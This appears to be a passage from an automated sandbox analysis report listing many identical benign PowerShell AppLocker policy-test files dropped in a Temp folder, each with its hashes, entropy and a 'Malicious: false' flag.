File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_232uoc2g.0fp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a4o3nhh.hgs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33xqug3k.g4g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pybed0l.awq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vrr3bta.pac.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4elj2xmu.dqy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vksjxdp.15x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ni5n5ky.l5u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ap2oft40.i0v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b30hmtqg.dcl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg2qandh.mth.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsx0wp1t.imi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bv04hus3.3lt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj5mccdi.2uj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjv5txq5.dgm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czpua5m2.c3h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbqbmdqq.snf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f30c5odb.xo3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg5iunns.u55.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1ey1vki.0eu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1txpuym.w3p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4hibmwn.tx1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_janle1nu.5bo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbvzrlof.pc1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5eczvtf.1rm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0e03vwh.3mh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lquilxtg.pdg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0tjjnwz.35f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mh5v0rco.eod.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnqaulia.woe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvjvlzy1.0qb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfcwddxi.qbz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhapjpc4.qjk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuzpu5qh.2gq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
